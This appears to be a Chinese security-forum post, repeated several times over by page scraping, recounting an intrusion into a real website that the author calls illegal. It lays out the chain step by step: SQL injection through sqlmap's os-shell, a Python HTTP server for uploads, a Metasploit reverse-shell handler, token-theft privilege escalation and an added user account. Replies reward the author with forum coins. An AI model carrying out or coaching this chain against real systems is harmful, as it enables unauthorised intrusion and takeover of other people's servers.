一前言

这段时间一直在捣鼓sql注入和msf联合getshell，拿到网站服务器。

1.1收集信息

因为主要想练习sql注入，所以信息收集做的比较简单：
通过sqlmap获取shell权限利用msf获取反弹shell并getshell成功
通过fofa找到相关cms

发现后台登录页面有post sql注入

1.2利用sqlmap一把梭并获取os-shell

二.利用python搭建一个简单的http服务器

python -m SimpleHTTPServer

1.1在这里要给他的服务器写入一个目录
md C:\test
1.用自己的服务器上文件上传到被攻击服务器上

三然后我们在msf上操作

1.1 ：输入 use exploit/mulit/hander

1.2 : 输入 set lhost 接收反弹shell的ip

1.2 ：输入 run 一把嗦

四.成功进入该服务器

这时发现我们只有gust权限难受

五.开启艰难的提权之路

1.1利用方法

内核提权

窃取管理tokens 提权

弟弟目前只知道着两种

本文只利用tokens 提权方式有机会写一篇内核提权的文章

使用use incognito来加载会话令牌模块
然后list_tokens -u来列出会话令牌

———————————————————————————————————————————————————————————————————
提权成功

六.创建用户

命令：net user 用户名密码 /add

用户名	金币	时间	理由
和谐文明	5.00	2020-09-07 08:08:29	一个受益终生的帖子~~
奖励系统	100.00	2020-09-03 21:09:53	投稿满 10 赞奖励
奖励系统	50.00	2020-09-03 19:07:41	投稿满 5 赞奖励
炸宝宝	10.00	2020-09-03 18:06:33	一个受益终生的帖子~~
锦衣	5.00	2020-09-03 17:05:40	一个受益终生的帖子~~
Track-聂风	80.00	2020-09-03 17:05:25	鼓励同学第一次实战，提权可以再想一想，可以找一找有没有其他漏洞

非法网站从sqlmap到msf提权远程连接成功

一前言

1.1收集信息

1.2利用sqlmap一把梭并获取os-shell

二.利用python搭建一个简单的http服务器

三然后我们在msf上操作

1.1 ：输入 use exploit/mulit/hander

1.2 : 输入 set lhost 接收反弹shell的ip

1.2 ：输入 run 一把嗦

四.成功进入该服务器

这时发现我们只有gust权限难受

五.开启艰难的提权之路

1.1利用方法

内核提权

窃取管理tokens 提权

六.创建用户

淦

思索许久……发现忘了把自己加入管理员用户组了！！！！！

搞定

评论列表

评论列表

评论列表

评论列表

评论列表

评论列表

非法网站从sqlmap到msf提权远程连接成功

一 前言

1.1收集信息

1.2利用sqlmap一把梭并获取os-shell

二.利用python搭建一个简单的http服务器

三 然后我们在msf上操作

1.1 ：输入 use exploit/mulit/hander

1.2 : 输入 set lhost 接收反弹shell的ip

1.2 ：输入 run 一把嗦

四.成功进入该服务器

这时发现我们只有gust权限 难受

五.开启艰难的提权之路

1.1利用方法

内核提权

窃取管理tokens 提权

六.创建用户

淦

思索许久……发现忘了把自己加入管理员用户组了 ！！！！！

搞定

评论列表 默认排序 默认排序 The Latest Reply

评论列表 默认排序 默认排序 The Latest Reply

评论列表 默认排序 默认排序 The Latest Reply

评论列表 默认排序 默认排序 The Latest Reply

评论列表 默认排序 默认排序 The Latest Reply

评论列表 默认排序 默认排序 The Latest Reply

一前言

三然后我们在msf上操作

这时发现我们只有gust权限难受

思索许久……发现忘了把自己加入管理员用户组了！！！！！

评论列表

评论列表

评论列表

评论列表

评论列表

评论列表